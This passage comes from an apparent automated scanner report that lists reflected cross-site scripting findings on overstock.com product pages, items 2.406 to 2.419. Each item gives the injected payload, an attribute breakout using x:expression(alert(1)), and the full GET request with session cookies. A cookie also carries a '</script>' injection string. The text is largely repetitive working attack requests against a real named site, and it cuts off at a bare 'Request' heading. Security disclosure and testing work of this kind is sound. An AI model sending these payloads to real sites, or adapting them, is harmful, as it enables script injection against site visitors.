GET /Jewelry-Watches/18k-Gold-over-Sterling-Silver-Multi-gemstone-Hoop-Earrings/3128810/product.html?9f349"style%3d"x%3aexpression(alert(1))"e9d993e339f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.406. http://www.overstock.com/Jewelry-Watches/18kt-Over-Sterling-Silver-and-1-8-ct-tw-Diamond-Bracelet-J-K-I3/4473432/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3360"style%3d"x%3aexpression(alert(1))"6e57bad4c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3360"style="x:expression(alert(1))"6e57bad4c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/18kt-Over-Sterling-Silver-and-1-8-ct-tw-Diamond-Bracelet-J-K-I3/4473432/product.html?e3360"style%3d"x%3aexpression(alert(1))"6e57bad4c2=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.407. http://www.overstock.com/Jewelry-Watches/22k-Gold-Silver-Double-Hoop-Diamond-cut-Earrings/3437593/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d880e"style%3d"x%3aexpression(alert(1))"f0e3c7701eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d880e"style="x:expression(alert(1))"f0e3c7701eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/22k-Gold-Silver-Double-Hoop-Diamond-cut-Earrings/3437593/product.html?d880e"style%3d"x%3aexpression(alert(1))"f0e3c7701eb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.408. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Diamond-accented-Quartz-Chronograph-Bracelet-Watch/4611516/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688ef"style%3d"x%3aexpression(alert(1))"0bf7fcb04cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688ef"style="x:expression(alert(1))"0bf7fcb04cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Akribos-XXIV-Mens-Diamond-accented-Quartz-Chronograph-Bracelet-Watch/4611516/product.html?688ef"style%3d"x%3aexpression(alert(1))"0bf7fcb04cb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.409. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Large-Dial-Diamond-Quartz-Chronograph-Bracelet-Watch/3465738/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a749"style%3d"x%3aexpression(alert(1))"27f1edd2797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a749"style="x:expression(alert(1))"27f1edd2797 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Akribos-XXIV-Mens-Large-Dial-Diamond-Quartz-Chronograph-Bracelet-Watch/3465738/product.html?4a749"style%3d"x%3aexpression(alert(1))"27f1edd2797=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.410. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Saturnos-Skeleton-Dial-Automatic-Watch/4719552/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcd0"style%3d"x%3aexpression(alert(1))"9d89aa4facd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbcd0"style="x:expression(alert(1))"9d89aa4facd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Akribos-XXIV-Mens-Saturnos-Skeleton-Dial-Automatic-Watch/4719552/product.html?fbcd0"style%3d"x%3aexpression(alert(1))"9d89aa4facd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.411. http://www.overstock.com/Jewelry-Watches/Barbie-Interchangeable-Girls-Watch/3010615/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c83"style%3d"x%3aexpression(alert(1))"9ccc0733ea1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f2c83"style="x:expression(alert(1))"9ccc0733ea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Barbie-Interchangeable-Girls-Watch/3010615/product.html?f2c83"style%3d"x%3aexpression(alert(1))"9ccc0733ea1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.412. http://www.overstock.com/Jewelry-Watches/Black-plated-Tungsten-Carbide-Band-8-mm/4747377/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d45e0"style%3d"x%3aexpression(alert(1))"b67dba536ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d45e0"style="x:expression(alert(1))"b67dba536ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Black-plated-Tungsten-Carbide-Band-8-mm/4747377/product.html?d45e0"style%3d"x%3aexpression(alert(1))"b67dba536ac=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.413. http://www.overstock.com/Jewelry-Watches/Breast-Cancer-Awareness-Designer-Bangle-Bracelet/4069809/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad8c"style%3d"x%3aexpression(alert(1))"09e075ac40f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ad8c"style="x:expression(alert(1))"09e075ac40f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Breast-Cancer-Awareness-Designer-Bangle-Bracelet/4069809/product.html?3ad8c"style%3d"x%3aexpression(alert(1))"09e075ac40f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.414. http://www.overstock.com/Jewelry-Watches/Citizen-Eco-Drive-Mens-Chronograph-Canvas-Strap-Watch/3950639/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e8e1"style%3d"x%3aexpression(alert(1))"1b5196268da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e8e1"style="x:expression(alert(1))"1b5196268da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Citizen-Eco-Drive-Mens-Chronograph-Canvas-Strap-Watch/3950639/product.html?2e8e1"style%3d"x%3aexpression(alert(1))"1b5196268da=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.415. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Character-Mens-Watch/4421993/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bc41"style%3d"x%3aexpression(alert(1))"b4a3b8bb35a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bc41"style="x:expression(alert(1))"b4a3b8bb35a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Disneys-Mickey-Mouse-Character-Mens-Watch/4421993/product.html?5bc41"style%3d"x%3aexpression(alert(1))"b4a3b8bb35a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.416. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Character-Womens-Watch/4421886/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6706b"style%3d"x%3aexpression(alert(1))"607ae858cd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6706b"style="x:expression(alert(1))"607ae858cd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Disneys-Mickey-Mouse-Character-Womens-Watch/4421886/product.html?6706b"style%3d"x%3aexpression(alert(1))"607ae858cd6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.417. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Womens-Silvertone-Watch/4421887/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd1c"style%3d"x%3aexpression(alert(1))"c80f0faade1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cd1c"style="x:expression(alert(1))"c80f0faade1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Disneys-Mickey-Mouse-Womens-Silvertone-Watch/4421887/product.html?8cd1c"style%3d"x%3aexpression(alert(1))"c80f0faade1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.418. http://www.overstock.com/Jewelry-Watches/Disneys-Minnie-Mouse-Womens-Silvertone-Watch/4421888/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 143d9"style%3d"x%3aexpression(alert(1))"b722c3d009b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 143d9"style="x:expression(alert(1))"b722c3d009b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Disneys-Minnie-Mouse-Womens-Silvertone-Watch/4421888/product.html?143d9"style%3d"x%3aexpression(alert(1))"b722c3d009b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.419. http://www.overstock.com/Jewelry-Watches/Dufonte-by-Lucien-Piccard-Two-tone-Crystal-Watch/1856866/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c871"style%3d"x%3aexpression(alert(1))"32de36c4cac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c871"style="x:expression(alert(1))"32de36c4cac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
